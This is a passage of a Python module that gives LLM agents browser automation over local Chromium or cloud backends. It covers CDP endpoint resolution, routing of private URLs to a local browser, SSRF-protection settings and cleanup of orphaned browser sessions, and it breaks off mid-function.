browser_tool.py
1 #!/usr/bin/env python3 2 """ 3 Browser Tool Module 4 5 This module provides browser automation tools using agent-browser CLI. It 6 supports multiple backends — **Browser Use** (cloud, default for Nous 7 subscribers), **Browserbase** (cloud, direct credentials), and **local 8 Chromium** — with identical agent-facing behaviour. The backend is 9 auto-detected from config and available credentials. 10 11 The tool uses agent-browser's accessibility tree (ariaSnapshot) for text-based 12 page representation, making it ideal for LLM agents without vision capabilities. 13 14 Features: 15 - **Local mode** (default): zero-cost headless Chromium via agent-browser. 16 Works on Linux servers without a display. One-time setup: 17 ``agent-browser install`` (downloads Chromium) or 18 ``agent-browser install --with-deps`` (also installs system libraries for 19 Debian/Ubuntu/Docker). 20 - **Cloud mode**: Browserbase or Browser Use cloud execution when configured. 21 - Session isolation per task ID 22 - Text-based page snapshots using accessibility tree 23 - Element interaction via ref selectors (@e1, @e2, etc.) 24 - Task-aware content extraction using LLM summarization 25 - Automatic cleanup of browser sessions 26 27 Environment Variables: 28 - BROWSERBASE_API_KEY: API key for direct Browserbase cloud mode 29 - BROWSERBASE_PROJECT_ID: Project ID for direct Browserbase cloud mode 30 - BROWSER_USE_API_KEY: API key for direct Browser Use cloud mode 31 - BROWSERBASE_PROXIES: Enable/disable residential proxies (default: "true") 32 - BROWSERBASE_ADVANCED_STEALTH: Enable advanced stealth mode with custom Chromium, 33 requires Scale Plan (default: "false") 34 - BROWSERBASE_KEEP_ALIVE: Enable keepAlive for session reconnection after disconnects, 35 requires paid plan (default: "true") 36 - BROWSERBASE_SESSION_TIMEOUT: Custom session timeout in milliseconds. Set to extend 37 beyond project default. Common values: 600000 (10min), 1800000 (30min) (default: none) 38 39 Usage: 40 from tools.browser_tool import browser_navigate, browser_snapshot, browser_click 41 42 # Navigate to a page 43 result = browser_navigate("https://example.com", task_id="task_123") 44 45 # Get page snapshot 46 snapshot = browser_snapshot(task_id="task_123") 47 48 # Click an element 49 browser_click("@e5", task_id="task_123") 50 """ 51 52 import atexit 53 import functools 54 import json 55 import logging 56 import os 57 import re 58 import signal 59 import subprocess 60 import shutil 61 import sys 62 import tempfile 63 import threading 64 import time 65 import requests 66 from typing import Dict, Any, Optional, List, Tuple 67 from pathlib import Path 68 from agent.auxiliary_client import call_llm 69 from hermes_constants import get_hermes_home 70 from utils import is_truthy_value 71 from hermes_cli.config import cfg_get 72 73 try: 74 from tools.website_policy import check_website_access 75 except Exception: 76 check_website_access = lambda url: None # noqa: E731 — fail-open if policy module unavailable 77 78 try: 79 from tools.url_safety import is_safe_url as _is_safe_url 80 except Exception: 81 _is_safe_url = lambda url: False # noqa: E731 — fail-closed: block all if safety module unavailable 82 from tools.browser_providers.base import CloudBrowserProvider 83 from tools.browser_providers.browserbase import BrowserbaseProvider 84 from tools.browser_providers.browser_use import BrowserUseProvider 85 from tools.browser_providers.firecrawl import FirecrawlProvider 86 from tools.tool_backend_helpers import normalize_browser_cloud_provider 87 88 # Camofox local anti-detection browser backend (optional). 89 # When CAMOFOX_URL is set, all browser operations route through the 90 # camofox REST API instead of the agent-browser CLI. 91 try: 92 from tools.browser_camofox import is_camofox_mode as _is_camofox_mode 93 except ImportError: 94 _is_camofox_mode = lambda: False # noqa: E731 95 96 logger = logging.getLogger(__name__) 97 98 # Standard PATH entries for environments with minimal PATH (e.g. systemd services). 99 # Includes Android/Termux and macOS Homebrew locations needed for agent-browser, 100 # npx, node, and Android's glibc runner (grun). 101 _SANE_PATH_DIRS = ( 102 "/data/data/com.termux/files/usr/bin", 103 "/data/data/com.termux/files/usr/sbin", 104 "/opt/homebrew/bin", 105 "/opt/homebrew/sbin", 106 "/usr/local/sbin", 107 "/usr/local/bin", 108 "/usr/sbin", 109 "/usr/bin", 110 "/sbin", 111 "/bin", 112 ) 113 _SANE_PATH = os.pathsep.join(_SANE_PATH_DIRS) 114 115 116 @functools.lru_cache(maxsize=1) 117 def _discover_homebrew_node_dirs() -> tuple[str, ...]: 118 """Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24). 119 120 When Node is installed via ``brew install node@24`` and NOT linked into 121 /opt/homebrew/bin, agent-browser isn't discoverable on the default PATH. 122 This function finds those directories so they can be prepended. 123 """ 124 dirs: list[str] = [] 125 homebrew_opt = "/opt/homebrew/opt" 126 if not os.path.isdir(homebrew_opt): 127 return tuple(dirs) 128 try: 129 for entry in os.listdir(homebrew_opt): 130 if entry.startswith("node") and entry != "node": 131 bin_dir = os.path.join(homebrew_opt, entry, "bin") 132 if os.path.isdir(bin_dir): 133 dirs.append(bin_dir) 134 except OSError: 135 pass 136 return tuple(dirs) 137 138 139 def _browser_candidate_path_dirs() -> list[str]: 140 """Return ordered browser CLI PATH candidates shared by discovery and execution.""" 141 hermes_home = get_hermes_home() 142 hermes_node_bin = str(hermes_home / "node" / "bin") 143 return [hermes_node_bin, *list(_discover_homebrew_node_dirs()), *_SANE_PATH_DIRS] 144 145 146 def _merge_browser_path(existing_path: str = "") -> str: 147 """Prepend browser-specific PATH fallbacks without reordering existing entries.""" 148 path_parts = [p for p in (existing_path or "").split(os.pathsep) if p] 149 existing_parts = set(path_parts) 150 prefix_parts: list[str] = [] 151 152 for part in _browser_candidate_path_dirs(): 153 if not part or part in existing_parts or part in prefix_parts: 154 continue 155 if os.path.isdir(part): 156 prefix_parts.append(part) 157 158 return os.pathsep.join(prefix_parts + path_parts) 159 160 # Throttle screenshot cleanup to avoid repeated full directory scans. 161 _last_screenshot_cleanup_by_dir: dict[str, float] = {} 162 163 # ============================================================================ 164 # Configuration 165 # ============================================================================ 166 167 # Default timeout for browser commands (seconds) 168 DEFAULT_COMMAND_TIMEOUT = 30 169 170 # Max tokens for snapshot content before summarization 171 SNAPSHOT_SUMMARIZE_THRESHOLD = 8000 172 173 # Commands that legitimately return empty stdout (e.g. close, record). 174 _EMPTY_OK_COMMANDS: frozenset = frozenset({"close", "record"}) 175 176 _cached_command_timeout: Optional[int] = None 177 _command_timeout_resolved = False 178 179 180 def _get_command_timeout() -> int: 181 """Return the configured browser command timeout from config.yaml. 182 183 Reads ``config["browser"]["command_timeout"]`` and falls back to 184 ``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable. Result is 185 cached after the first call and cleared by ``cleanup_all_browsers()``. 186 """ 187 global _cached_command_timeout, _command_timeout_resolved 188 if _command_timeout_resolved: 189 return _cached_command_timeout # type: ignore[return-value] 190 191 _command_timeout_resolved = True 192 result = DEFAULT_COMMAND_TIMEOUT 193 try: 194 from hermes_cli.config import read_raw_config 195 cfg = read_raw_config() 196 val = cfg_get(cfg, "browser", "command_timeout") 197 if val is not None: 198 result = max(int(val), 5) # Floor at 5s to avoid instant kills 199 except Exception as e: 200 logger.debug("Could not read command_timeout from config: %s", e) 201 _cached_command_timeout = result 202 return result 203 204 205 def _get_vision_model() -> Optional[str]: 206 """Model for browser_vision (screenshot analysis — multimodal).""" 207 return os.getenv("AUXILIARY_VISION_MODEL", "").strip() or None 208 209 210 def _get_extraction_model() -> Optional[str]: 211 """Model for page snapshot text summarization — same as web_extract.""" 212 return os.getenv("AUXILIARY_WEB_EXTRACT_MODEL", "").strip() or None 213 214 215 def _resolve_cdp_override(cdp_url: str) -> str: 216 """Normalize a user-supplied CDP endpoint into a concrete connectable URL. 217 218 Accepts: 219 - full websocket endpoints: ws://host:port/devtools/browser/... 220 - HTTP discovery endpoints: http://host:port or http://host:port/json/version 221 - bare websocket host:port values like ws://host:port 222 223 For discovery-style endpoints we fetch /json/version and return the 224 webSocketDebuggerUrl so downstream tools always receive a concrete browser 225 websocket instead of an ambiguous host:port URL. 226 """ 227 raw = (cdp_url or "").strip() 228 if not raw: 229 return "" 230 231 lowered = raw.lower() 232 if "/devtools/browser/" in lowered: 233 return raw 234 235 discovery_url = raw 236 if lowered.startswith(("ws://", "wss://")): 237 if raw.count(":") == 2 and raw.rstrip("/").rsplit(":", 1)[-1].isdigit() and "/" not in raw.split(":", 2)[-1]: 238 discovery_url = ("http://" if lowered.startswith("ws://") else "https://") + raw.split("://", 1)[1] 239 else: 240 return raw 241 242 if discovery_url.lower().endswith("/json/version"): 243 version_url = discovery_url 244 else: 245 version_url = discovery_url.rstrip("/") + "/json/version" 246 247 try: 248 response = requests.get(version_url, timeout=10) 249 response.raise_for_status() 250 payload = response.json() 251 except Exception as exc: 252 logger.warning("Failed to resolve CDP endpoint %s via %s: %s", raw, version_url, exc) 253 return raw 254 255 ws_url = str(payload.get("webSocketDebuggerUrl") or "").strip() 256 if ws_url: 257 logger.info("Resolved CDP endpoint %s -> %s", raw, ws_url) 258 return ws_url 259 260 logger.warning("CDP discovery at %s did not return webSocketDebuggerUrl; using raw endpoint", version_url) 261 return raw 262 263 264 def _get_cdp_override() -> str: 265 """Return a normalized CDP URL override, or empty string. 266 267 Precedence is: 268 1. ``BROWSER_CDP_URL`` env var (live override from ``/browser connect``) 269 2. ``browser.cdp_url`` in config.yaml (persistent config) 270 271 When either is set, we skip both Browserbase and the local headless 272 launcher and connect directly to the supplied Chrome DevTools Protocol 273 endpoint. 274 """ 275 env_override = os.environ.get("BROWSER_CDP_URL", "").strip() 276 if env_override: 277 return _resolve_cdp_override(env_override) 278 279 try: 280 from hermes_cli.config import read_raw_config 281 282 cfg = read_raw_config() 283 browser_cfg = cfg.get("browser", {}) 284 if isinstance(browser_cfg, dict): 285 return _resolve_cdp_override(str(browser_cfg.get("cdp_url", "") or "")) 286 except Exception as e: 287 logger.debug("Could not read browser.cdp_url from config: %s", e) 288 289 return "" 290 291 292 def _get_dialog_policy_config() -> Tuple[str, float]: 293 """Read ``browser.dialog_policy`` + ``browser.dialog_timeout_s`` from config. 294 295 Returns a ``(policy, timeout_s)`` tuple, falling back to the supervisor's 296 defaults when keys are absent or invalid. 297 """ 298 # Defer imports so browser_tool can be imported in minimal environments. 299 from tools.browser_supervisor import ( 300 DEFAULT_DIALOG_POLICY, 301 DEFAULT_DIALOG_TIMEOUT_S, 302 _VALID_POLICIES, 303 ) 304 305 try: 306 from hermes_cli.config import read_raw_config 307 308 cfg = read_raw_config() 309 browser_cfg = cfg.get("browser", {}) if isinstance(cfg, dict) else {} 310 if not isinstance(browser_cfg, dict): 311 return DEFAULT_DIALOG_POLICY, DEFAULT_DIALOG_TIMEOUT_S 312 policy = str(browser_cfg.get("dialog_policy") or DEFAULT_DIALOG_POLICY) 313 if policy not in _VALID_POLICIES: 314 logger.debug("Invalid browser.dialog_policy=%r; using default", policy) 315 policy = DEFAULT_DIALOG_POLICY 316 timeout_raw = browser_cfg.get("dialog_timeout_s") 317 try: 318 timeout_s = float(timeout_raw) if timeout_raw is not None else DEFAULT_DIALOG_TIMEOUT_S 319 if timeout_s <= 0: 320 timeout_s = DEFAULT_DIALOG_TIMEOUT_S 321 except (TypeError, ValueError): 322 timeout_s = DEFAULT_DIALOG_TIMEOUT_S 323 return policy, timeout_s 324 except Exception: 325 return DEFAULT_DIALOG_POLICY, DEFAULT_DIALOG_TIMEOUT_S 326 327 328 def _ensure_cdp_supervisor(task_id: str) -> None: 329 """Start a CDP supervisor for ``task_id`` if an endpoint is reachable. 330 331 Idempotent — delegates to ``SupervisorRegistry.get_or_start`` which skips 332 when a supervisor for this ``(task_id, cdp_url)`` already exists and 333 tears down + restarts on URL change. Safe to call on every 334 ``browser_navigate`` / ``/browser connect`` without worrying about 335 double-attach. 336 337 Resolves the CDP URL in this order: 338 1. ``BROWSER_CDP_URL`` / ``browser.cdp_url`` — covers ``/browser connect`` 339 and config-set overrides. 340 2. ``_active_sessions[task_id]["cdp_url"]`` — covers Browserbase + any 341 other cloud provider whose ``create_session`` returns a raw CDP URL. 342 343 Swallows all errors — failing to attach the supervisor must not break 344 the browser session itself. The agent simply won't see 345 ``pending_dialogs`` / ``frame_tree`` fields in snapshots. 346 """ 347 cdp_url = _get_cdp_override() 348 if not cdp_url: 349 # Fallback: active session may carry a per-session CDP URL from a 350 # cloud provider (Browserbase sets this). 351 with _cleanup_lock: 352 session_info = _active_sessions.get(task_id, {}) 353 maybe = str(session_info.get("cdp_url") or "") 354 if maybe: 355 cdp_url = _resolve_cdp_override(maybe) 356 if not cdp_url: 357 return 358 try: 359 from tools.browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found] 360 361 policy, timeout_s = _get_dialog_policy_config() 362 SUPERVISOR_REGISTRY.get_or_start( 363 task_id=task_id, 364 cdp_url=cdp_url, 365 dialog_policy=policy, 366 dialog_timeout_s=timeout_s, 367 ) 368 except Exception as exc: 369 logger.debug( 370 "CDP supervisor attach for task=%s failed (non-fatal): %s", 371 task_id, 372 exc, 373 ) 374 375 376 def _stop_cdp_supervisor(task_id: str) -> None: 377 """Stop the CDP supervisor for ``task_id`` if one exists. No-op otherwise.""" 378 try: 379 from tools.browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found] 380 381 SUPERVISOR_REGISTRY.stop(task_id) 382 except Exception as exc: 383 logger.debug("CDP supervisor stop for task=%s failed (non-fatal): %s", task_id, exc) 384 385 386 # ============================================================================ 387 # Cloud Provider Registry 388 # ============================================================================ 389 390 _PROVIDER_REGISTRY: Dict[str, type] = { 391 "browserbase": BrowserbaseProvider, 392 "browser-use": BrowserUseProvider, 393 "firecrawl": FirecrawlProvider, 394 } 395 396 _cached_cloud_provider: Optional[CloudBrowserProvider] = None 397 _cloud_provider_resolved = False 398 _allow_private_urls_resolved = False 399 _cached_allow_private_urls: Optional[bool] = None 400 _cached_agent_browser: Optional[str] = None 401 _agent_browser_resolved = False 402 403 404 def _get_cloud_provider() -> Optional[CloudBrowserProvider]: 405 """Return the configured cloud browser provider, or None for local mode. 406 407 Reads ``config["browser"]["cloud_provider"]`` once and caches the result 408 for the process lifetime. An explicit ``local`` provider disables cloud 409 fallback. If unset, fall back to Browserbase when direct or managed 410 Browserbase credentials are available. 411 """ 412 global _cached_cloud_provider, _cloud_provider_resolved 413 if _cloud_provider_resolved: 414 return _cached_cloud_provider 415 416 _cloud_provider_resolved = True 417 try: 418 from hermes_cli.config import read_raw_config 419 cfg = read_raw_config() 420 browser_cfg = cfg.get("browser", {}) 421 provider_key = None 422 if isinstance(browser_cfg, dict) and "cloud_provider" in browser_cfg: 423 provider_key = normalize_browser_cloud_provider( 424 browser_cfg.get("cloud_provider") 425 ) 426 if provider_key == "local": 427 _cached_cloud_provider = None 428 return None 429 if provider_key and provider_key in _PROVIDER_REGISTRY: 430 _cached_cloud_provider = _PROVIDER_REGISTRY[provider_key]() 431 except Exception as e: 432 logger.debug("Could not read cloud_provider from config: %s", e) 433 434 if _cached_cloud_provider is None: 435 # Prefer Browser Use (managed Nous gateway or direct API key), 436 # fall back to Browserbase (direct credentials only). 437 fallback_provider = BrowserUseProvider() 438 if fallback_provider.is_configured(): 439 _cached_cloud_provider = fallback_provider 440 else: 441 fallback_provider = BrowserbaseProvider() 442 if fallback_provider.is_configured(): 443 _cached_cloud_provider = fallback_provider 444 445 return _cached_cloud_provider 446 447 448 from hermes_constants import is_termux as _is_termux_environment 449 450 451 def _browser_install_hint() -> str: 452 if _is_termux_environment(): 453 return "npm install -g agent-browser && agent-browser install" 454 return "npm install -g agent-browser && agent-browser install --with-deps" 455 456 457 def _requires_real_termux_browser_install(browser_cmd: str) -> bool: 458 return _is_termux_environment() and _is_local_mode() and browser_cmd.strip() == "npx agent-browser" 459 460 461 def _termux_browser_install_error() -> str: 462 return ( 463 "Local browser automation on Termux cannot rely on the bare npx fallback. " 464 f"Install agent-browser explicitly first: {_browser_install_hint()}" 465 ) 466 467 468 def _is_local_mode() -> bool: 469 """Return True when the browser tool will use a local browser backend.""" 470 if _get_cdp_override(): 471 return False 472 return _get_cloud_provider() is None 473 474 475 def _is_local_backend() -> bool: 476 """Return True when the browser runs locally (no cloud provider). 477 478 SSRF protection is only meaningful for cloud backends (Browserbase, 479 BrowserUse) where the agent could reach internal resources on a remote 480 machine. For local backends — Camofox, or the built-in headless 481 Chromium without a cloud provider — the user already has full terminal 482 and network access on the same machine, so the check adds no security 483 value. 484 """ 485 return _is_camofox_mode() or _get_cloud_provider() is None 486 487 488 _auto_local_for_private_urls_resolved = False 489 _cached_auto_local_for_private_urls: bool = True 490 491 492 def _auto_local_for_private_urls() -> bool: 493 """Return whether a cloud-configured install should auto-spawn a local 494 Chromium for LAN/localhost URLs. 495 496 Reads ``browser.auto_local_for_private_urls`` once (default ``True``) and 497 caches it for the process lifetime. When enabled, ``browser_navigate`` 498 routes URLs whose host resolves to a private/loopback/LAN address to a 499 local headless Chromium sidecar even when a cloud provider (Browserbase 500 / Browser-Use / Firecrawl) is configured globally. Public URLs continue 501 to use the cloud provider in the same conversation. 502 """ 503 global _auto_local_for_private_urls_resolved, _cached_auto_local_for_private_urls 504 if _auto_local_for_private_urls_resolved: 505 return _cached_auto_local_for_private_urls 506 507 _auto_local_for_private_urls_resolved = True 508 try: 509 from hermes_cli.config import read_raw_config 510 cfg = read_raw_config() 511 browser_cfg = cfg.get("browser", {}) 512 if isinstance(browser_cfg, dict) and "auto_local_for_private_urls" in browser_cfg: 513 _cached_auto_local_for_private_urls = bool( 514 browser_cfg.get("auto_local_for_private_urls") 515 ) 516 except Exception as e: 517 logger.debug("Could not read auto_local_for_private_urls from config: %s", e) 518 return _cached_auto_local_for_private_urls 519 520 521 def _url_is_private(url: str) -> bool: 522 """Return True when the URL's host resolves to a private/LAN/loopback address. 523 524 Reuses ``tools.url_safety.is_safe_url`` as the oracle — if the SSRF check 525 would reject the URL, we treat it as "private" for routing purposes. DNS 526 resolution failures are treated as NOT private (fall through to whatever 527 backend is configured, which will surface the DNS error naturally). 528 """ 529 try: 530 # is_safe_url returns False for private/loopback/link-local/CGNAT AND 531 # for DNS failures. We only want the private-network case here, so 532 # we parse + check the host shape as a DNS-failure sieve first. 533 from urllib.parse import urlparse 534 import ipaddress 535 import socket 536 parsed = urlparse(url) 537 hostname = (parsed.hostname or "").strip().lower().rstrip(".") 538 if not hostname: 539 return False 540 # Literal IP → check directly 541 try: 542 ip = ipaddress.ip_address(hostname) 543 return ( 544 ip.is_private 545 or ip.is_loopback 546 or ip.is_link_local 547 or ip in ipaddress.ip_network("100.64.0.0/10") 548 ) 549 except ValueError: 550 pass 551 # Hostname — must resolve to confirm it's private (bare "localhost" 552 # resolves to 127.0.0.1 via /etc/hosts). Short-circuit on obvious 553 # names to avoid a DNS hop. 554 if hostname in ("localhost",) or hostname.endswith(".localhost"): 555 return True 556 if hostname.endswith(".local") or hostname.endswith(".lan") or hostname.endswith(".internal"): 557 return True 558 try: 559 addr_info = socket.getaddrinfo(hostname, None, socket.AF_UNSPEC, socket.SOCK_STREAM) 560 except socket.gaierror: 561 return False # DNS fail → not private, let the normal path fail 562 for _, _, _, _, sockaddr in addr_info: 563 try: 564 ip = ipaddress.ip_address(sockaddr[0]) 565 except ValueError: 566 continue 567 if ( 568 ip.is_private 569 or ip.is_loopback 570 or ip.is_link_local 571 or ip in ipaddress.ip_network("100.64.0.0/10") 572 ): 573 return True 574 return False 575 except Exception as exc: 576 logger.debug("URL-privacy check failed for %s: %s", url, exc) 577 return False 578 579 580 def _navigation_session_key(task_id: str, url: str) -> str: 581 """Pick the session key that should handle ``url`` for ``task_id``. 582 583 Returns the bare task_id unless ALL of these are true: 584 1. A cloud provider is configured (``_get_cloud_provider()`` is not None). 585 2. Auto-local routing is enabled (``browser.auto_local_for_private_urls``, 586 default True). 587 3. The URL resolves to a private/LAN/loopback address. 588 4. A CDP override is not active (that path owns the whole session). 589 5. Camofox mode is not active (Camofox is already local-only). 590 591 When all are true, returns ``f"{task_id}::local"`` so the hybrid-routing 592 path spawns a local Chromium sidecar while the cloud session (if any) 593 continues to serve public URLs. 594 """ 595 if task_id is None: 596 task_id = "default" 597 if _get_cdp_override(): 598 return task_id 599 if _is_camofox_mode(): 600 return task_id 601 if _get_cloud_provider() is None: 602 return task_id 603 if not _auto_local_for_private_urls(): 604 return task_id 605 if not _url_is_private(url): 606 return task_id 607 return f"{task_id}{_LOCAL_SUFFIX}" 608 609 610 def _is_local_sidecar_key(session_key: str) -> bool: 611 """Return True when ``session_key`` is a hybrid-routing local sidecar.""" 612 return session_key.endswith(_LOCAL_SUFFIX) 613 614 615 def _last_session_key(task_id: str) -> str: 616 """Return the session key to use for a non-nav browser tool call. 617 618 If a previous ``browser_navigate`` on this task_id set a last-active key, 619 use it so snapshot/click/fill/etc. hit the same session. Otherwise fall 620 back to the bare task_id (matches original behavior for tasks that never 621 triggered hybrid routing). 622 """ 623 if task_id is None: 624 task_id = "default" 625 return _last_active_session_key.get(task_id, task_id) 626 627 628 def _allow_private_urls() -> bool: 629 """Return whether the browser is allowed to navigate to private/internal addresses. 630 631 Reads ``config["browser"]["allow_private_urls"]`` once and caches the result 632 for the process lifetime. Defaults to ``False`` (SSRF protection active). 633 """ 634 global _cached_allow_private_urls, _allow_private_urls_resolved 635 if _allow_private_urls_resolved: 636 return _cached_allow_private_urls 637 638 _allow_private_urls_resolved = True 639 _cached_allow_private_urls = False # safe default 640 try: 641 from hermes_cli.config import read_raw_config 642 cfg = read_raw_config() 643 browser_cfg = cfg.get("browser", {}) 644 if isinstance(browser_cfg, dict): 645 _cached_allow_private_urls = is_truthy_value( 646 browser_cfg.get("allow_private_urls"), default=False 647 ) 648 except Exception as e: 649 logger.debug("Could not read allow_private_urls from config: %s", e) 650 return _cached_allow_private_urls 651 652 653 def _socket_safe_tmpdir() -> str: 654 """Return a short temp directory path suitable for Unix domain sockets. 655 656 macOS sets ``TMPDIR`` to ``/var/folders/xx/.../T/`` (~51 chars). When we 657 append ``agent-browser-hermes_…`` the resulting socket path exceeds the 658 104-byte macOS limit for ``AF_UNIX`` addresses, causing agent-browser to 659 fail with "Failed to create socket directory" or silent screenshot failures. 660 661 Linux ``tempfile.gettempdir()`` already returns ``/tmp``, so this is a 662 no-op there. On macOS we bypass ``TMPDIR`` and use ``/tmp`` directly 663 (symlink to ``/private/tmp``, sticky-bit protected, always available). 664 """ 665 if sys.platform == "darwin": 666 return "/tmp" 667 return tempfile.gettempdir() 668 669 670 # Track active sessions per "session key". 671 # 672 # A "session key" is either the bare task_id (cloud/default path) OR a composite 673 # like f"{task_id}::local" when the hybrid-routing feature spawns a local sidecar 674 # browser for a LAN/localhost URL while a cloud provider is configured globally. 675 # Both forms flow through the same _active_sessions / _run_browser_command / 676 # cleanup_browser code paths — the key is opaque to those internals. 677 # 678 # Stores: session_name (always), bb_session_id + cdp_url (cloud mode only) 679 _active_sessions: Dict[str, Dict[str, str]] = {} # session_key -> {session_name, ...} 680 _recording_sessions: set = set() # session_keys with active recordings 681 682 # Tracks the most recent session_key used per task_id. Set by browser_navigate() 683 # after it chooses a backend for a URL; read by every non-nav browser tool 684 # (snapshot/click/fill/eval/...) so they target the session that served the last 685 # navigation. Without this, a task that navigated to localhost on the local 686 # sidecar would fall back to the cloud session on its next snapshot call. 687 _last_active_session_key: Dict[str, str] = {} # task_id -> session_key 688 _LOCAL_SUFFIX = "::local" 689 690 # Flag to track if cleanup has been done 691 _cleanup_done = False 692 693 # ============================================================================= 694 # Inactivity Timeout Configuration 695 # ============================================================================= 696 697 # Session inactivity timeout (seconds) - cleanup if no activity for this long 698 # Default: 5 minutes. Needs headroom for LLM reasoning between browser commands, 699 # especially when subagents are doing multi-step browser tasks. 700 BROWSER_SESSION_INACTIVITY_TIMEOUT = int(os.environ.get("BROWSER_INACTIVITY_TIMEOUT", "300")) 701 702 # Track last activity time per session 703 _session_last_activity: Dict[str, float] = {} 704 705 # Background cleanup thread state 706 _cleanup_thread = None 707 _cleanup_running = False 708 # Protects _session_last_activity AND _active_sessions for thread safety 709 # (subagents run concurrently via ThreadPoolExecutor) 710 _cleanup_lock = threading.Lock() 711 712 713 def _emergency_cleanup_all_sessions(): 714 """ 715 Emergency cleanup of all active browser sessions. 716 Called on process exit or interrupt to prevent orphaned sessions. 717 718 Also runs the orphan reaper to clean up daemons left behind by previously 719 crashed hermes processes — this way every clean hermes exit sweeps 720 accumulated orphans, not just ones that actively used the browser tool. 721 """ 722 global _cleanup_done 723 if _cleanup_done: 724 return 725 _cleanup_done = True 726 727 # Clean up this process's own sessions first, so their owner_pid files 728 # are removed before the reaper scans. 729 if _active_sessions: 730 logger.info("Emergency cleanup: closing %s active session(s)...", 731 len(_active_sessions)) 732 try: 733 cleanup_all_browsers() 734 except Exception as e: 735 logger.error("Emergency cleanup error: %s", e) 736 finally: 737 with _cleanup_lock: 738 _active_sessions.clear() 739 _session_last_activity.clear() 740 _recording_sessions.clear() 741 742 # Sweep orphans from other crashed hermes processes. Safe even if we 743 # never used the browser — uses owner_pid liveness to avoid reaping 744 # daemons owned by other live hermes processes. 745 try: 746 _reap_orphaned_browser_sessions() 747 except Exception as e: 748 logger.debug("Orphan reap on exit failed: %s", e) 749 750 751 # Register cleanup via atexit only. Previous versions installed SIGINT/SIGTERM 752 # handlers that called sys.exit(), but this conflicts with prompt_toolkit's 753 # async event loop — a SystemExit raised inside a key-binding callback 754 # corrupts the coroutine state and makes the process unkillable. atexit 755 # handlers run on any normal exit (including sys.exit), so browser sessions 756 # are still cleaned up without hijacking signals. 757 atexit.register(_emergency_cleanup_all_sessions) 758 759 760 # ============================================================================= 761 # Inactivity Cleanup Functions 762 # ============================================================================= 763 764 def _cleanup_inactive_browser_sessions(): 765 """ 766 Clean up browser sessions that have been inactive for longer than the timeout. 767 768 This function is called periodically by the background cleanup thread to 769 automatically close sessions that haven't been used recently, preventing 770 orphaned sessions (local or Browserbase) from accumulating. 771 """ 772 current_time = time.time() 773 sessions_to_cleanup = [] 774 775 with _cleanup_lock: 776 for task_id, last_time in list(_session_last_activity.items()): 777 if current_time - last_time > BROWSER_SESSION_INACTIVITY_TIMEOUT: 778 sessions_to_cleanup.append(task_id) 779 780 for task_id in sessions_to_cleanup: 781 try: 782 elapsed = int(current_time - _session_last_activity.get(task_id, current_time)) 783 logger.info("Cleaning up inactive session for task: %s (inactive for %ss)", task_id, elapsed) 784 cleanup_browser(task_id) 785 with _cleanup_lock: 786 if task_id in _session_last_activity: 787 del _session_last_activity[task_id] 788 except Exception as e: 789 logger.warning("Error cleaning up inactive session %s: %s", task_id, e) 790 791 792 def _write_owner_pid(socket_dir: str, session_name: str) -> None: 793 """Record the current hermes PID as the owner of a browser socket dir. 794 795 Written atomically to ``<socket_dir>/<session_name>.owner_pid`` so the 796 orphan reaper can distinguish daemons owned by a live hermes process 797 (don't reap) from daemons whose owner crashed (reap). Best-effort — 798 an OSError here just falls back to the legacy ``tracked_names`` 799 heuristic in the reaper. 800 """ 801 try: 802 path = os.path.join(socket_dir, f"{session_name}.owner_pid") 803 with open(path, "w") as f: 804 f.write(str(os.getpid())) 805 except OSError as exc: 806 logger.debug("Could not write owner_pid file for %s: %s", 807 session_name, exc) 808 809 810 def _reap_orphaned_browser_sessions(): 811 """Scan for orphaned agent-browser daemon processes from previous runs. 812 813 When the Python process that created a browser session exits uncleanly 814 (SIGKILL, crash, gateway restart), the in-memory ``_active_sessions`` 815 tracking is lost but the node + Chromium processes keep running. 816 817 This function scans the tmp directory for ``agent-browser-*`` socket dirs 818 left behind by previous runs, reads the daemon PID files, and kills any 819 daemons whose owning hermes process is no longer alive. 820 821 Ownership detection priority: 822 1. ``<session>.owner_pid`` file (written by current code) — if the 823 referenced hermes PID is alive, leave the daemon alone regardless 824 of whether it's in *this* process's ``_active_sessions``. This is 825 cross-process safe: two concurrent hermes instances won't reap each 826 other's daemons. 827 2. Fallback for daemons that predate owner_pid: check 828 ``_active_sessions`` in the current process. If not tracked here, 829 treat as orphan (legacy behavior). 830 831 Safe to call from any context — atexit, cleanup thread, or on demand. 832 """ 833 import glob 834 835 tmpdir = _socket_safe_tmpdir() 836 pattern = os.path.join(tmpdir, "agent-browser-h_*") 837 socket_dirs = glob.glob(pattern) 838 # Also pick up CDP sessions 839 socket_dirs += glob.glob(os.path.join(tmpdir, "agent-browser-cdp_*")) 840 # Also pick up cloud-provider sessions (browser-use/browserbase/firecrawl) 841 socket_dirs += glob.glob(os.path.join(tmpdir, "agent-browser-hermes_*")) 842 843 if not socket_dirs: 844 return 845 846 # Build set of session_names currently tracked by this process (fallback path) 847 with _cleanup_lock: 848 tracked_names = { 849 info.get("session_name") 850 for info in _active_sessions.values() 851 if info.get("session_name") 852 } 853 854 reaped = 0 855 for socket_dir in socket_dirs: 856 dir_name = os.path.basename(socket_dir) 857 # dir_name is "agent-browser-{session_name}" 858 session_name = dir_name.removeprefix("agent-browser-") 859 if not session_name: 860 continue 861 862 # Ownership check: prefer owner_pid file (cross-process safe). 863 owner_pid_file = os.path.join(socket_dir, f"{session_name}.owner_pid") 864 owner_alive: Optional[bool] = None # None = owner_pid missing/unreadable 865 if os.path.isfile(owner_pid_file): 866 try: 867 owner_pid = int(Path(owner_pid_file).read_text().strip()) 868 try: 869 os.kill(owner_pid, 0) 870 owner_alive = True 871 except ProcessLookupError: 872 owner_alive = False 873 except PermissionError: 874 # Owner exists but we can't signal it (different uid). 875 # Treat as alive — don't reap someone else's session. 876 owner_alive = True 877 except (ValueError, OSError): 878 owner_alive = None # corrupt file — fall through 879 880 if owner_alive is True: 881 # Owner is alive — this session belongs to a live hermes process. 882 continue 883 884 if owner_alive is None: 885 # No owner_pid file (legacy daemon). Fall back to in-process 886 # tracking: if this process knows about the session, leave alone. 887 if session_name in tracked_names: 888 continue 889 890 # owner_alive is False (dead owner) OR legacy daemon not tracked here. 891 pid_file = os.path.join(socket_dir, f"{session_name}.pid") 892 if not os.path.isfile(pid_file): 893 # No daemon PID file — just a stale dir, remove it 894 shutil.rmtree(socket_dir, ignore_errors=True) 895 continue 896 897 try: 898 daemon_pid = int(Path(pid_file).read_text().strip()) 899 except 